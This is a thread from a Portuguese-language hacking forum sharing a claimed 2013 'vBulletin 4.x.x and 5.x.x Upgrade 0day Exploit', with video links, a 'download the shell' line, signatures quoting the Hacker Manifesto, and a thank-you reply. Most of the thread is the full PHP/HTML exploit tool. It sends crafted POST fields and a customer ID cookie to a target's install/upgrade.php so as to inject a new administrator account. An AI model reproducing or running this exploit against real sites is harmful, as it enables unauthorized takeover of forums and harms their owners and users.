Tweet
[ame="www.youtube.com/watch?v=5aWbbK5odbM"]www.youtube.com/watch?v=5aWbbK5odbM[/ame]
vBulletin hacked Zero Day vulnerability
Downlaod da Shell:
-
[ame="www.youtube.com/watch?v=5aWbbK5odbM"]www.youtube.com/watch?v=5aWbbK5odbM[/ame]
Downlaod da Shell:
O diabo sabe, não porque é sábio. O diabo sabe porque é velho.
Email: paulo@guiadohacker.com.brSkype: sophos.loko
Não preciso de convite, já faço parte da elite -
Ai vai o possível exploit.
Código:<html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>vBulletin 0day</title> <style type="text/css"> <!-- body { background-color: #000; text-align: center; color: #063; font-size: large; } .a { font-size: 24px; } .f { color: #060; } .gbf { color: #F00; } .dd { color: #F00; } .w { font-size: large; } a:link { text-decoration: none; } a:visited { text-decoration: none; } a:hover { text-decoration: none; } a:active { text-decoration: none; } --> </style></head><body> <p class="a"> <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1> <br>Created by: 1337 <br>Found on: 08/22/2013 <br>Website: http://www.madleets.com </p> <br> <?php //extract data from the post if(isset($_POST['submit'])){ extract($_POST); //set POST variables $url = $_POST['url']; $fields = array( 'ajax' => urlencode('1'), 'version' => urlencode('install'), 'checktable' => urlencode('false'), 'firstrun' => urlencode('false'), 'step' => urlencode('7'), 'startat' => urlencode('0'), 'only' => urlencode('false'), 'customerid' => urlencode($_POST['customerid']), 'options[skiptemplatemerge]' => urlencode('0'), 'response' => urlencode('yes'), 'htmlsubmit' => urlencode('1'), 'htmldata[username]' => urlencode($_POST['username']), 'htmldata[password]' => urlencode($_POST['password']), 'htmldata[confirmpassword]' => urlencode($_POST['password']), 'htmldata[email]' => urlencode($_POST['email']) ); //url-ify the data for the POST foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; } rtrim($fields_string, '&'); //open connection $ch = curl_init(); //set the url, number of POST vars, POST data curl_setopt($ch,CURLOPT_URL, $url); curl_setopt($ch,CURLOPT_POST, count($fields)); curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string); curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE); curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] ); //execute post $result = curl_exec($ch); //close connection curl_close($ch); exit(); } ?> <center> <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>"> <span>Example:http://test.com/forum/install/upgrade.php</span><br> <span>Website:</span> <input name="url" type="text" tabindex="1" size="60" /> <br> <span>Customer ID:</span> <input name="customerid" type="text" tabindex="2" size="40" /> <br> <span>Username:</span> <input name="username" type="text" tabindex="3" size="40" /> <br> <span>Password:</span> <input name="password" type="text" tabindex="4" size="40" /> <br> <span>Email:</span> <input name="email" type="text" tabindex="5" maxlength="40" /> <input name="submit" type="submit" value="Inject Admin"> </form> </center> <p class="a">------------------------------------------------------------------------------------------------------------------</p> <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p> <p class="a">------------------------------------------------------------------------------------------------------------------</p> </div> </pre> <p class="a"> </p> <p align="center"> </body></html>Last edited by Vetus; 21-11-2013, 16:23.Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.
I am a hacker, and this is my manifesto. You may stop this individual,
but you can't stop us all... after all, we're all alike. -
muito bom!! não sabia obrigado por postarComment
Comment